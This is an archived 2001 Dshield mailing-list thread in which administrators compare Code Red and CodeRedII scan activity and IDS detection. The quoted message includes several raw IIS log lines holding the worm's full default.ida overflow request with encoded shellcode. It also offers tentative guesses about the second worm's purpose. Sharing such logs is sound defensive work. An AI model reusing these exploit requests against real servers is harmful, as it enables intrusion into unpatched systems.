[Dshield] Code Red Host Scans (and more)

Andrew Redman aredman at san.rr.com
Sun Aug 5 02:50:21 GMT 2001


I recently sniffed a packet from the second variety of worm mentioned below,
and included in the packet was the text: "CodeRedII", which, although I
don't have a sniffed packet of the first version, seems to say that it is
the second version. Also, starting this morning (~10AM PST) the scans
started flooding in. Before today I've had a total of less than 60 scans to
my IP. Today, though, i've had over 60 every three hours, with about 75% of
them coming from IP's that share the first 2 octets with mine. It looks to
me like its getting worse, as I have caught 4 more scans while writing this
post.

~~~~
Andrew Redman
Aredman at san.rr.com


On: Saturday, August 04, 2001 8:31 AM John Groseclose wrote:


> At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
> My IDS (Cisco Secure) is not detecting the host scans from infected
> machines.  I can see the default.ida?NNN stuff but I think that is
> the second stage (infection).  I need to see the port 80 scans
> regardless of whether they are scanning MS boxes.  Any assistance
> will be repaid with good Karma.
>
> The "scan" *is* the "exploit." Code Red doesn't check first to see if
> you're running IIS before attempting to infect. There are no primary
> or secondary stages to the Code Red worm - it either infects your
> machine, or it doesn't.
>
> The weirder part is this... A "normal" Code Red attempt looks like this:
>
> cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET
> /default.ida?
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858
%ucb
>
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3
> %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"
>
> Since 12:44:09 GMT, I've been receiving *these* in my logs:
>
> h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700]
> "GET /defau
>
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u909
0%u6
>
858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
u819
> 0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-"
"-"
> www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET
> /default.ida?XXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd
3%u7
>
801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%
u000
> 3%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
>
> It *looks* like the second worm is trying to reboot the machine via
> an exploit for cmd.exe, but since I don't have any Windows machines
> around to work with, I can't really do any experimentation with it.
> Perhaps someone wrote a "counter-worm."
> --
> John Groseclose
> iain at caradoc.org
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield
>




More information about the list mailing list